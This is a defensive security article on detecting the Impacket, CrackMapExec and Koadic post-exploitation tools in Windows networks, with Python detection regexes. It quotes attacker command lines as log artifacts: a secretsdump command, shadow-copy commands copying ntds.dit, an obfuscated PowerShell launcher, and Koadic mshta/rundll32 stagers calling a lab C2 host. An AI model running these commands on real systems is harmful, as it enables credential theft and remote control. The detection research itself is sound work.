How to detect attacks on Windows infrastructure: studying hacker tools

The number of attacks in the corporate sector grows every year: for example, in 2017, 13% more unique incidents were recorded than in 2016, and by the end of 2018, 27% more incidents than in the previous period. This includes those where the main working tool is the Windows operating system. In 2017-2018, the APT groups Dragonfly, APT28 and APT MuddyWater carried out attacks on government and military organizations in Europe, North America and Saudi Arabia. Three tools were used for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It is worth noting that these tools are not used for initial penetration, but to develop an attack inside the infrastructure. Attackers use them at different stages of the attack that follow penetration of the perimeter. This, by the way, is difficult to detect, and often only with the help of technologies for identifying traces of compromise in network traffic, or tools that allow detecting the attacker's actions after he has penetrated the infrastructure. The tools provide a variety of functions, from transferring files to interacting with the registry and executing commands on a remote machine. We studied these tools to determine their network activity.

What we needed to do:

  • Understand how the hacking tools work. Find out what attackers need in order to exploit and which technologies they can use.
  • Find what is not detected by information security tools in the first stages of an attack. The reconnaissance phase may be skipped, either because the attacker is an insider, or because the attacker is exploiting a gap in the infrastructure that was not previously known. It becomes possible to restore the whole chain of his actions, hence the desire to detect further movement.
  • Eliminate false positives from intrusion detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, errors are frequent. Usually the infrastructure has a sufficient number of ways, indistinguishable from legitimate ones at first glance, to obtain any information.

What do these tools give attackers? If it is Impacket, attackers get a large library of modules that can be used at different stages of the attack that follow the breach of the perimeter. Many tools use Impacket modules internally, for example Metasploit. It has dcomexec and wmiexec for remote command execution, and secretsdump for obtaining accounts from memory, which are added from Impacket. As a result, correct detection of the activity of such a library also ensures detection of its derivatives.

It is no coincidence that the developers wrote "Powered by Impacket" about CrackMapExec (or simply CME). In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, deployment of Meterpreter or an Empire agent for remote execution, and Bloodhound on board.

The third tool we chose was Koadic. It is quite recent: it was presented at the international hacker conference DEFCON 25 in 2017 and is distinguished by its approach: it works over HTTP, JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The developers call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very broad, from reconnaissance inside AD and collecting data from internal MS SQL servers, to techniques for obtaining credentials: this is the SMB relay attack, and obtaining the ntds.dit file containing user password hashes from a domain controller. Impacket also executes commands remotely using four different methods: WMI, the Windows Scheduler Management Service, DCOM, and SMB, and it needs credentials to do so.

Secretsdump

Let's look at secretsdump. This module can target both user machines and domain controllers. It can be used to obtain copies of the memory areas LSA, SAM, SECURITY and NTDS.dit, so it can be seen at different stages of the attack. The first step in the module's operation is authentication over SMB, which requires either the user's password or its hash in order to automatically carry out a Pass the Hash attack. Next comes a request to open access to the Service Control Manager (SCM) and to gain access to the registry via the winreg protocol, using which the attacker can learn the data of the branches of interest and receive the results over SMB.

In Fig. 1 we see exactly how, when using the winreg protocol, access is obtained by a registry key with LSA. To do this, the DCERPC command with opcode 15, OpenKey, is used.

Fig. 1. Opening a registry key using the winreg protocol

Next, when access to the key has been obtained, the values are saved with the SaveKey command with opcode 20. Impacket does this in a very specific way. It saves the values to a file whose name is a string of 8 random characters with .tmp appended. In addition, the file is then transferred over SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining a registry key from a remote machine

It turns out that such activity on the network can be detected by requests to certain registry branches using the winreg protocol, specific names, commands and their order.

This module also leaves traces in the Windows event log, which makes it easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following sequence of events:

1. 4624 - remote Logon.
2. 5145 - checking access rights to the winreg remote service.
3. 5145 - checking access rights to a file in the System32 directory. The file has the random name mentioned above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like many post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on a remote machine. This module also requires authentication over SMB, either with a password or with a password hash. In Fig. 3 we see an example of how such a tool works; in this case it is the local administrator console.

Fig. 3. Interactive smbexec console

The first step of smbexec after authentication is to open the SCM with the OpenSCManagerW command (15). The request is notable: the MachineName field is DUMMY.

Fig. 4. Request to open the Service Control Manager

Next, a service is created using the CreateServiceW command (12). In the case of smbexec, we can see the same command construction logic every time. In Fig. 5, green marks the command parameters that do not change, and yellow marks what the attacker can change. It is easy to see that the name of the executable file, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service using the Service Control Manager

Smbexec also leaves clear traces in the Windows event log. In the Windows Server 2016 log for an interactive command shell with the ipconfig command, we will see the following key sequence of events:

1. 4697 - installation of a service on the victim's machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of the cmd.exe process with the arguments from point 1.
3. 5145 - checking access rights to the __output file in the C$ directory.
4. 4697 - installation of a service on the victim's machine.

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of the cmd.exe process with the arguments from point 1.
6. 5145 - checking access rights to the __output file in the C$ directory.

Impacket is the basis for the development of attack tools. It supports almost all protocols in Windows infrastructure and at the same time has its own characteristic features. Here are specific winreg requests, the use of the SCM API with characteristic command formation, the file name format, and the SMB share SYSTEM32.
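
The command skeleton that secretsdump and smbexec leave in events 4688 and 4697 can be matched directly. The following is an added detection example, not code from the article or from Impacket; the event fields (`t`, `host`, `id`, `data`), the host names and the sample events are constructed, and the path separators in the command lines are written out.

```python
import re

# Fixed skeleton that Impacket wraps around each command (from the event
# samples in this article); only the inner command and output path vary.
IMPACKET_TEMPLATE = re.compile(
    r"/Q\s+/c\s+echo\s+(?P<inner>.+?)\s+\^>\s+(?P<out>\S*__output)"
    r"(?:\s+2\^>\^&1)?\s+>\s+%TEMP%\\execute\.bat\s+&\s+\S+\s+/Q\s+/c\s+"
    r"%TEMP%\\execute\.bat\s+&\s+del\s+%TEMP%\\execute\.bat",
    re.IGNORECASE,
)

def match_template(cmdline):
    """Return (inner_command, output_path) when cmdline follows the skeleton."""
    m = IMPACKET_TEMPLATE.search(cmdline)
    return (m.group("inner"), m.group("out")) if m else None

def correlate(events, window=10):
    """Flag 4688/4697 events that match; confidence is high when the same host
    logs a 5145 access check on __output within `window` seconds."""
    findings = []
    for ev in events:
        hit = match_template(ev["data"]) if ev["id"] in (4688, 4697) else None
        if not hit:
            continue
        followed = any(
            o["id"] == 5145 and o["host"] == ev["host"]
            and "__output" in o["data"] and 0 <= o["t"] - ev["t"] <= window
            for o in events
        )
        findings.append({"host": ev["host"], "event": ev["id"], "command": hit[0],
                         "confidence": "high" if followed else "medium"})
    return findings

SMBEXEC = (r"%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > "
           r"%TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat")
VSS = (r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C '
       r"vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat"
       r" & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat")

# Constructed events: t is seconds, data is the command line or share path.
EVENTS = [
    {"t": 0, "host": "SRV01", "id": 4624, "data": "network logon"},
    {"t": 1, "host": "SRV01", "id": 4697, "data": SMBEXEC},
    {"t": 2, "host": "SRV01", "id": 5145, "data": r"\\*\C$ __output"},
    {"t": 3, "host": "DC01", "id": 4688, "data": VSS},
    {"t": 4, "host": "WS07", "id": 4688,  # benign echo redirect, must not match
     "data": r'"C:\Windows\system32\cmd.exe" /c echo build ok > C:\ci\status.txt'},
]

if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding)
```

The match keys on the parts of the command that the article says are hard to change without breaking the module, so renaming the output file or batch file would require a looser pattern.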

CRACKMAPEXEC

The CME tool is designed to automate the actions that an attacker has to perform to advance within the network. It allows working in conjunction with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, allows advanced reconnaissance within the network. It collects data about users, machines, groups and sessions and is supplied as a PowerShell script or a binary file. LDAP or SMB-based protocols are used to collect information. The CME integration module allows Bloodhound to be downloaded to the victim's machine, run, and the collected data received after execution, thereby automating actions in the system and making them less noticeable. The Bloodhound graphical shell presents the collected data as graphs, which allows finding the shortest path from the attacker's machine to the domain administrator.

Fig. 6. Bloodhound interface

To run on the victim's machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: this is a cmd.exe command call and obfuscated code in the form of arguments in XML format.

Fig. 7. Creating a task via CME

After the task has been submitted for execution, the victim's machine starts Bloodhound itself, and this can be seen in the traffic. The module is characterized by LDAP queries to obtain standard groups, a list of all machines and users in the domain, and obtaining information about active user sessions through the SRVSVC NetSessEnum request.

Fig. 8. Obtaining a list of active sessions via SMB

In addition, launching Bloodhound on the victim's machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name "C:\Windows\System32\cmd.exe". What is notable about it are the command line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

The enum_avproducts module is very interesting in terms of functionality and implementation. WMI allows using the WQL query language to retrieve data from various Windows objects, which is essentially what this CME module uses. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim's machine. To obtain the required data, the module connects to the root\SecurityCenter2 namespace, then generates a WQL query and receives a response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

Often, WMI auditing (Trace WMI-Activity), in whose events useful information about WQL queries can be found, may be disabled. But if it is enabled, then when the enum_avproducts script is run, an event with ID 11 will be saved. It will contain the name of the user who sent the request and the name in the root\SecurityCenter2 namespace.

Each of the CME modules had its own artifacts, whether specific WQL queries or the creation of a certain type of task in the task scheduler with obfuscation, and Bloodhound-specific activity in LDAP and SMB.

KOADIC

A distinctive feature of Koadic is the use of the JavaScript and VBScript interpreters built into Windows. In this sense, it follows the living off the land trend, that is, it has no external dependencies and uses standard Windows tools. This is a tool for full-fledged Command & Control (CnC), since after infection an "implant" is installed on the machine, allowing it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If there are insufficient privileges for full operation on the victim's side, Koadic is able to raise them using User Account Control bypass (UAC bypass) techniques.

Fig. 10. Koadic shell

The victim must initiate communication with the Command & Control server. To do this, it needs to contact a previously prepared URI and receive the main Koadic body using one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initializing a session with the CnC server

Based on the response variable WS, it becomes clear that execution takes place through WScript.Shell, and the variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE contain key information about the parameters of the current session. This is the first request-response pair in the HTTP connection with the CnC server. Subsequent requests are directly related to the functionality of the called modules (implants). All Koadic modules work only with an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways to launch it. Below is the request-response pair for loading the Mimikatz implant.

Fig. 12. Transferring Mimikatz to Koadic

You can see how the URI format in the request has changed. It now contains a value for the csrf variable, which is responsible for the selected module. Do not pay attention to its name; we all know that CSRF is usually understood differently. The response was the same main Koadic body, to which code related to Mimikatz was added. It is quite large, so let's look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of execution is transmitted over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules that can execute commands remotely. Here we will see the same URI generation method and the familiar sid and csrf variables. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Below is such code contained in the HTTP response of the CnC server.

Fig. 14. Implant code exec_cmd

The GAWTUUGCFI variable with the familiar WS attribute is needed for code execution. With its help, the implant calls the shell, handling two branches of code: shell.exec with the return of the output data stream, and shell.run without return.

Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:

  • special formation of HTTP requests,
  • use of the winHttpRequests API,
  • creation of a WScript.Shell object via ActiveXObject,
  • a large executable body.

The initial connection is initiated by the stager, so it is possible to detect its activity through Windows events. For mshta, this is event 4688, which indicates the creation of a process with the start attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see other 4688 events with attributes that characterize it perfectly:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

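The 4688 command lines listed in this section can be triaged with three signatures, one per artifact type. This is an added example, not code from the article or from Koadic; the sample lines are the ones quoted above with path separators written out, plus one constructed benign line, and the function names are hypothetical.

```python
import re

# mshta fetching a remote URL is a generic stager signal, not Koadic-only.
STAGER = re.compile(r'mshta\.exe"?\s+https?://(?P<c2>[^/\s]+)/\S+', re.I)
# rundll32 + URL carrying sid/csrf + mshtml,RunHTMLApplication.
IMPLANT = re.compile(
    r'rundll32\.exe"?\s+https?://(?P<c2>[^/\s]+)/[^?\s]*\?sid=(?P<sid>[0-9a-f]{32});'
    r'\s*csrf=(?P<csrf>[0-9a-f]{32})?;.*mshtml,RunHTMLApplication', re.I)
# cmd /q /c chcp 437 & <command> 1> <GUID-named .txt> 2>&1
JOB = re.compile(
    r'cmd\.exe"?\s+/q\s+/c\s+chcp\s+437\s+&\s+(?P<inner>.+?)\s+1>\s+\S*'
    r'[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.txt\s+2>&1', re.I)

def classify(cmdline):
    """Return a dict describing the artifact found in cmdline, or None."""
    for kind, rx in (("stager", STAGER), ("implant", IMPLANT), ("job", JOB)):
        m = rx.search(cmdline)
        if m:
            return {"kind": kind, **{k: v for k, v in m.groupdict().items() if v}}
    return None

def summarize(cmdlines):
    """Aggregate hits into C2 endpoints, sessions (sid -> csrf values), commands."""
    c2, sessions, commands = set(), {}, []
    for line in cmdlines:
        hit = classify(line)
        if not hit:
            continue
        if "c2" in hit:
            c2.add(hit["c2"])
        if hit["kind"] == "implant":
            keys = sessions.setdefault(hit["sid"], set())
            if "csrf" in hit:
                keys.add(hit["csrf"])
        elif hit["kind"] == "job":
            commands.append(hit["inner"])
    return {"c2": sorted(c2), "sessions": sessions, "commands": commands}

TEMP = r"C:\Users\user02\AppData\Local\Temp"
SAMPLES = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    r"rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c;"
    r" csrf=;\..\..\..\mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;"
    r"csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> '
    + TEMP + r"\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> '
    + TEMP + r"\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1",
    # Constructed benign line: mshta opening a local HTA must not match.
    r"C:\Windows\system32\mshta.exe C:\Apps\inventory\report.hta",
]

if __name__ == "__main__":
    print(summarize(SAMPLES))
```
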
Conclusions

The living off the land trend is gaining popularity among criminals. They use the tools and mechanisms built into Windows for their needs. We are seeing the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appear more and more in APT reports. The number of forks on GitHub for these tools is also growing, and new ones are appearing (there are already thousands of them now). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools; they are already on the victims' machines and help them bypass security measures. We focus on studying network communication: each tool described above leaves its traces in network traffic; a detailed study of them allowed us to teach our product PT Network Attack Discovery to detect them, which ultimately helps to investigate the entire chain of cyber incidents involving them.

Authors:

  • Anton Tyurin, Head of the Expert Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
